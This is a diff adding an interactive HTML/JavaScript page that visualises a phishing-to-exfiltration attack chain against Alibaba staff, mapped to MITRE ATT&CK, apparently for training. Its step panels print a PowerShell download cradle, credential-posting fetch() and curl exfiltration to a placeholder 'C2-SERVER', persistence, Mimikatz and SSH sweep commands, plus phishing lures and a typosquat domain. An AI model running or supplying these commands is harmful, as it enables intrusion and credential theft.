 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
160
  </div>
 
 
 
 
 
161
 
162
+ <!-- Exfiltrated Data -->
163
+ <div id="exfiltration" class="attack-node absolute left-[85%] top-[65%] bg-green-50 p-4 rounded-lg shadow-sm border-2 border-green-300 w-[160px] text-center hidden">
164
+ <div class="bg-green-100 p-3 rounded-full inline-block mb-2">
165
+ <i class="fas fa-cloud-download-alt text-green-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
166
  </div>
167
+ <h3 class="font-bold text-green-800">Exfiltrated Data</h3>
168
+ <p class="text-xs text-green-600 mt-1">*.sql, *.pem, *.key</p>
169
+ </div>
170
+
171
+ <!-- Attack Flow Arrows (dynamically drawn with JS) -->
172
+ <svg class="absolute inset-0 w-full h-full" id="attack-flow"></svg>
173
+
174
+ <!-- Attack Timeline Controls -->
175
+ <div class="absolute bottom-4 left-0 right-0 flex justify-center">
176
+ <div class="bg-white rounded-lg shadow-md p-4 flex items-center space-x-4">
177
+ <button id="prev-step" class="px-3 py-1 bg-gray-200 rounded-md hover:bg-gray-300">
178
+ <i class="fas fa-chevron-left"></i>
179
+ </button>
180
+ <div class="text-sm font-medium" id="current-step">Step 1: Initial Phishing</div>
181
+ <button id="next-step" class="px-3 py-1 bg-gray-200 rounded-md hover:bg-gray-300">
182
+ <i class="fas fa-chevron-right"></i>
183
+ </button>
184
+ <button id="play-attack" class="px-3 py-1 bg-blue-100 text-blue-700 rounded-md hover:bg-blue-200 ml-4">
185
+ <i class="fas fa-play mr-1"></i> Play Attack
186
+ </button>
187
  </div>
188
+ </div>
189
+
190
+ <!-- Tooltip -->
191
+ <div class="tooltip hidden" id="attack-tooltip"></div>
192
+ </div>
193
+
194
+ <!-- Attack Step Details -->
195
+ <div class="mt-8 bg-white rounded-lg shadow-md p-6">
196
+ <h2 class="text-xl font-bold text-gray-800 mb-4" id="step-title">Step 1: Initial Phishing</h2>
197
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
198
+ <div>
199
+ <h3 class="font-medium text-gray-700 mb-2">Technical Details</h3>
200
+ <div class="bg-gray-50 p-4 rounded-md" id="step-details">
201
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
202
+ <li>Email subjects: "紧急通知:阿里云账号异常登录提醒"</li>
203
+ <li>Body mimics official Alibaba Cloud communications</li>
204
+ <li>Contains malicious attachment or phishing link</li>
205
+ <li>Spoofed sender: security@alibaba-inc.com</li>
206
  </ul>
207
  </div>
208
  </div>
209
+ <div>
210
+ <h3 class="font-medium text-gray-700 mb-2">MITRE ATT&CK Mapping</h3>
211
+ <div class="bg-gray-50 p-4 rounded-md">
212
+ <div class="flex items-center mb-2">
213
+ <span class="bg-blue-100 text-blue-800 text-xs font-medium px-2.5 py-0.5 rounded mr-2">T1566.001</span>
214
+ <span>Spearphishing Attachment</span>
215
+ </div>
216
+ <div class="flex items-center">
217
+ <span class="bg-purple-100 text-purple-800 text-xs font-medium px-2.5 py-0.5 rounded mr-2">T1598</span>
218
+ <span>Phishing for Information</span>
219
+ </div>
 
220
  </div>
221
  </div>
222
  </div>
223
  </div>
224
  </div>
225
 
 
 
 
 
 
 
 
226
  <script>
227
+ // Attack steps data
228
+ const attackSteps = [
229
+ {
230
+ title: "Step 1: Initial Phishing",
231
+ details: `
232
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
233
+ <li>Email subjects: "紧急通知:阿里云账号异常登录提醒" or "内部会议纪要(机密)"</li>
234
+ <li>Body mimics official Alibaba Cloud communications</li>
235
+ <li>Contains malicious attachment or phishing link</li>
236
+ <li>Attachment: 阿里云安全报告_v2023.pdf (malicious macro)</li>
237
+ <li>Phishing URL: https://aliyun-support[.]com/verify</li>
238
+ <li>Spoofed sender: security@alibaba-inc.com</li>
239
+ <li>Typosquatting domain: al1baba-inc[.]com</li>
240
+ </ul>
241
+ `,
242
+ mitre: [
243
+ { id: "T1566.001", name: "Spearphishing Attachment" },
244
+ { id: "T1598", name: "Phishing for Information" }
245
+ ],
246
+ draw: (svg) => {
247
+ // Draw line from attacker to phishing server
248
+ drawLine(svg, "#attacker", "#phishing", "red");
249
+ // Draw line from phishing server to victim
250
+ drawLine(svg, "#phishing", "#victim", "red");
251
+ // Draw line from attacker to malicious doc
252
+ drawLine(svg, "#attacker", "#document", "red");
253
+ // Draw line from malicious doc to victim
254
+ drawLine(svg, "#document", "#victim", "red");
255
+ }
256
+ },
257
+ {
258
+ title: "Step 2: Payload Execution",
259
+ details: `
260
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
261
+ <li>Victim opens malicious document and enables macros</li>
262
+ <li>Macro executes PowerShell payload:</li>
263
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
264
+ powershell IEX (New-Object Net.WebClient).DownloadString('http://C2-SERVER/payload.ps1')
265
+ </div>
266
+ <li>Or victim enters credentials on phishing site</li>
267
+ <li>JavaScript steals credentials:</li>
268
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
269
+ fetch('http://C2-SERVER/steal', {<br>
270
+ &nbsp;&nbsp;method: 'POST',<br>
271
+ &nbsp;&nbsp;body: JSON.stringify({user: username, pass: password})<br>
272
+ });
273
+ </div>
274
+ </ul>
275
+ `,
276
+ mitre: [
277
+ { id: "T1059.001", name: "PowerShell" },
278
+ { id: "T1204.002", name: "Malicious File" }
279
+ ],
280
+ draw: (svg) => {
281
+ // Previous steps
282
+ attackSteps[0].draw(svg);
283
+
284
+ // Highlight victim
285
+ document.querySelector("#victim").classList.add("critical");
286
+
287
+ // Draw line from victim to workstation (compromise)
288
+ drawLine(svg, "#victim", "#workstation", "red", 3);
289
+
290
+ // Draw line from workstation to attacker (C2)
291
+ drawLine(svg, "#workstation", "#attacker", "red", 2, true);
292
+ }
293
+ },
294
+ {
295
+ title: "Step 3: C2 Implantation",
296
+ details: `
297
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
298
+ <li>Cobalt Strike beacon established</li>
299
+ <li>Persistence mechanisms installed:</li>
300
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
301
+ Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br>
302
+ Task: schtasks /create /tn "Windows Update" /tr "C:\Windows\System32\malicious.exe"
303
+ </div>
304
+ <li>C2 configuration:</li>
305
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
306
+ windows/x64/reflective PE<br>
307
+ HTTPS with valid certificate<br>
308
+ Multiple IP rotation via CDN
309
+ </div>
310
+ </ul>
311
+ `,
312
+ mitre: [
313
+ { id: "T1572", name: "Protocol Tunneling" },
314
+ { id: "T1547.001", name: "Registry Run Keys" },
315
+ { id: "T1053", name: "Scheduled Task" }
316
+ ],
317
+ draw: (svg) => {
318
+ // Previous steps
319
+ attackSteps[1].draw(svg);
320
+
321
+ // Highlight workstation as compromised
322
+ document.querySelector("#workstation").classList.remove("critical");
323
+ document.querySelector("#workstation").classList.add("compromised");
324
+
325
+ // Draw ongoing C2 communication
326
+ drawLine(svg, "#workstation", "#attacker", "red", 2, true);
327
+ }
328
+ },
329
+ {
330
+ title: "Step 4: Credential Theft",
331
+ details: `
332
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
333
+ <li>Credential harvesting:</li>
334
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
335
+ Mimikatz !sekurlsa::logonpasswords<br>
336
+ Search C:\Users\*\.ssh\id_rsa<br>
337
+ cmdkey /list
338
+ </div>
339
+ <li>Browser cookie theft:</li>
340
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
341
+ Decrypt Chrome/Edge cookies<br>
342
+ Filter for alibaba-inc.com sessions
343
+ </div>
344
+ <li>SSH key discovery:</li>
345
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
346
+ C:\Users\*\.ssh\id_rsa<br>
347
+ C:\Users\*\.ssh\config
348
+ </div>
349
+ </ul>
350
+ `,
351
+ mitre: [
352
+ { id: "T1555", name: "Credentials from Password Stores" },
353
+ { id: "T1552.001", name: "Credentials In Files" },
354
+ { id: "T1539", name: "Steal Web Session Cookie" }
355
+ ],
356
+ draw: (svg) => {
357
+ // Previous steps
358
+ attackSteps[2].draw(svg);
359
+
360
+ // Draw credential theft to attacker
361
+ drawLine(svg, "#workstation", "#attacker", "red", 3, true);
362
+
363
+ // Add tooltip to show credential flow
364
+ addTooltip("#workstation", "Sending stolen credentials to C2");
365
+ }
366
+ },
367
+ {
368
+ title: "Step 5: Lateral Movement",
369
+ details: `
370
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
371
+ <li>Internal reconnaissance:</li>
372
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
373
+ nmap -sS 10.0.0.0/24<br>
374
+ for ip in {1..254}; do ssh -o ConnectTimeout=1 user@10.0.0.$ip; done
375
+ </div>
376
+ <li>SSH access using stolen credentials:</li>
377
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
378
+ ssh -i id_rsa user@10.0.0.5<br>
379
+ plink.exe -ssh -P 22 -i id_rsa user@10.0.0.6
380
+ </div>
381
+ <li>Browser proxy for internal access:</li>
382
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
383
+ proxychains4 -q -f /path/to/config.txt firefox<br>
384
+ Proxy config: 1.2.3.4:8080
385
+ </div>
386
+ </ul>
387
+ `,
388
+ mitre: [
389
+ { id: "T1021.004", name: "Remote Services: SSH" },
390
+ { id: "T1090", name: "Proxy" },
391
+ { id: "T1018", name: "Remote System Discovery" }
392
+ ],
393
+ draw: (svg) => {
394
+ // Previous steps
395
+ attackSteps[3].draw(svg);
396
+
397
+ // Show compromised SSH server
398
+ document.querySelector("#ssh-server").classList.add("hidden");
399
+ document.querySelector("#compromised-ssh").classList.remove("hidden");
400
+
401
+ // Draw line from workstation to SSH server
402
+ drawLine(svg, "#workstation", "#compromised-ssh", "red", 3);
403
+
404
+ // Add tooltip to show lateral movement
405
+ addTooltip("#compromised-ssh", "Using stolen SSH keys for access");
406
+ }
407
+ },
408
+ {
409
+ title: "Step 6: Data Exfiltration",
410
+ details: `
411
+ <ul class="list-disc pl-5 text-sm text-gray-600 space-y-1">
412
+ <li>Target files for exfiltration:</li>
413
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
414
+ *.pem, *.key, *.sql, *.db
415
+ </div>
416
+ <li>Data collection methods:</li>
417
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
418
+ Browser JavaScript injection:<br>
419
+ document.querySelectorAll('input[type="password"]')
420
+ </div>
421
+ <li>Exfiltration techniques:</li>
422
+ <div class="bg-gray-200 p-2 rounded mt-2 font-mono text-xs">
423
+ split -b 5MB sensitive.tar.gz | curl -X POST -F 'file=@-' http://C2-SERVER/upload
424
+ </div>
425
+ </ul>
426
+ `,
427
+ mitre: [
428
+ { id: "T1041", name: "Exfiltration Over C2 Channel" },
429
+ { id: "T1020", name: "Automated Exfiltration" },
430
+ { id: "T1567", name: "Exfiltration Over Web Service" }
431
+ ],
432
+ draw: (svg) => {
433
+ // Previous steps
434
+ attackSteps[4].draw(svg);
435
+
436
+ // Show exfiltrated data
437
+ document.querySelector("#exfiltration").classList.remove("hidden");
438
+
439
+ // Draw line from database to exfiltration
440
+ drawLine(svg, "#database", "#exfiltration", "green", 3);
441
+
442
+ // Draw line from exfiltration to attacker
443
+ drawLine(svg, "#exfiltration", "#attacker", "green", 3, true);
444
+
445
+ // Add tooltip to show data flow
446
+ addTooltip("#exfiltration", "Sensitive data being exfiltrated to attacker");
447
+ }
448
+ }
449
+ ];
450
+
451
+ // Current step index
452
+ let currentStep = 0;
453
+
454
+ // Draw line between elements
455
+ function drawLine(svg, fromSelector, toSelector, color = "red", width = 2, animate = false) {
456
+ const fromEl = document.querySelector(fromSelector);
457
+ const toEl = document.querySelector(toSelector);
458
+
459
+ if (!fromEl || !toEl) return;
460
+
461
+ const fromRect = fromEl.getBoundingClientRect();
462
+ const toRect = toEl.getBoundingClientRect();
463
+ const svgRect = svg.getBoundingClientRect();
464
+
465
+ const x1 = fromRect.left + fromRect.width/2 - svgRect.left;
466
+ const y1 = fromRect.top + fromRect.height/2 - svgRect.top;
467
+ const x2 = toRect.left + toRect.width/2 - svgRect.left;
468
+ const y2 = toRect.top + toRect.height/2 - svgRect.top;
469
+
470
+ const line = document.createElementNS("http://www.w3.org/2000/svg", "line");
471
+ line.setAttribute("x1", x1);
472
+ line.setAttribute("y1", y1);
473
+ line.setAttribute("x2", x2);
474
+ line.setAttribute("y2", y2);
475
+ line.setAttribute("stroke", color);
476
+ line.setAttribute("stroke-width", width);
477
+ line.setAttribute("stroke-linecap", "round");
478
+
479
+ if (animate) {
480
+ line.classList.add("data-flow");
481
+ }
482
+
483
+ svg.appendChild(line);
484
+ }
485
+
486
+ // Add tooltip to element
487
+ function addTooltip(selector, text) {
488
+ const el = document.querySelector(selector);
489
+ const tooltip = document.getElementById("attack-tooltip");
490
+
491
+ if (!el || !tooltip) return;
492
+
493
+ el.addEventListener("mouseenter", (e) => {
494
+ const rect = el.getBoundingClientRect();
495
+ tooltip.textContent = text;
496
+ tooltip.style.left = `${rect.left + rect.width/2 - 150}px`;
497
+ tooltip.style.top = `${rect.top - 40}px`;
498
+ tooltip.classList.remove("hidden");
499
+ });
500
+
501
+ el.addEventListener("mouseleave", () => {
502
+ tooltip.classList.add("hidden");
503
+ });
504
+ }
505
 
506
+ // Update visualization for current step
507
+ function updateVisualization() {
508
+ const svg = document.getElementById("attack-flow");
509
+ svg.innerHTML = "";
510
+
511
+ // Reset all elements
512
+ document.querySelectorAll(".attack-node").forEach(el => {
513
+ el.classList.remove("critical", "compromised");
514
+ el.classList.remove("hidden");
515
+ });
516
+ document.getElementById("exfiltration").classList.add("hidden");
517
+ document.getElementById("compromised-ssh").classList.add("hidden");
518
+ document.getElementById("ssh-server").classList.remove("hidden");
519
+
520
+ // Draw current step
521
+ attackSteps[currentStep].draw(svg);
522
+
523
+ // Update step info
524
+ document.getElementById("step-title").textContent = attackSteps[currentStep].title;
525
+ document.getElementById("step-details").innerHTML = attackSteps[currentStep].details;
526
+ document.getElementById("current-step").textContent = attackSteps[currentStep].title;
527
+
528
+ // Update MITRE ATT&CK
529
+ const mitreContainer = document.querySelector(".bg-gray-50 > div:last-child");
530
+ mitreContainer.innerHTML = attackSteps[currentStep].mitre.map(item => `
531
+ <div class="flex items-center mb-2">
532
+ <span class="bg-blue-100 text-blue-800 text-xs font-medium px-2.5 py-0.5 rounded mr-2">${item.id}</span>
533
+ <span>${item.name}</span>
534
+ </div>
535
+ `).join("");
536
+ }
537
+
538
+ // Initialize
539
+ document.addEventListener("DOMContentLoaded", () => {
540
+ updateVisualization();
541
+
542
+ // Navigation controls
543
+ document.getElementById("prev-step").addEventListener("click", () => {
544
+ if (currentStep > 0) {
545
+ currentStep--;
546
+ updateVisualization();
547
  }
548
  });
549
+
550
+ document.getElementById("next-step").addEventListener("click", () => {
551
+ if (currentStep < attackSteps.length - 1) {
552
+ currentStep++;
553
+ updateVisualization();
554
+ }
555
+ });
556
+
557
+ // Play attack animation
558
+ document.getElementById("play-attack").addEventListener("click", () => {
559
+ currentStep = 0;
560
+ updateVisualization();
561
+
562
+ let i = 0;
563
+ const interval = setInterval(() => {
564
+ if (i < attackSteps.length - 1) {
565
+ i++;
566
+ currentStep = i;
567
+ updateVisualization();
568
+ } else {
569
+ clearInterval(interval);
570
+ }
571
+ }, 2000);
572
+ });
573
+
574
+ // Add tooltips to all attack nodes
575
+ addTooltip("#attacker", "Attacker controlled infrastructure");
576
+ addTooltip("#phishing", "Phishing server hosting fake login page");
577
+ addTooltip("#document", "Malicious document with embedded macro");
578
+ addTooltip("#victim", "Targeted employee receiving phishing email");
579
+ addTooltip("#workstation", "Compromised workstation with C2 beacon");
580
+ addTooltip("#ssh-server", "Internal SSH server target");
581
+ addTooltip("#compromised-ssh", "Compromised SSH server via stolen keys");
582
+ addTooltip("#database", "Internal database with sensitive information");
583
+ addTooltip("#exfiltration", "Stolen data being sent to attacker");
584
  });
585
  </script>
586
  <p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - 🧬 <a href="https://enzostvs-deepsite.hf.space?remix=capta1n/bas" style="color: #fff;text-decoration: underline;" target="_blank" >Remix</a></p></body>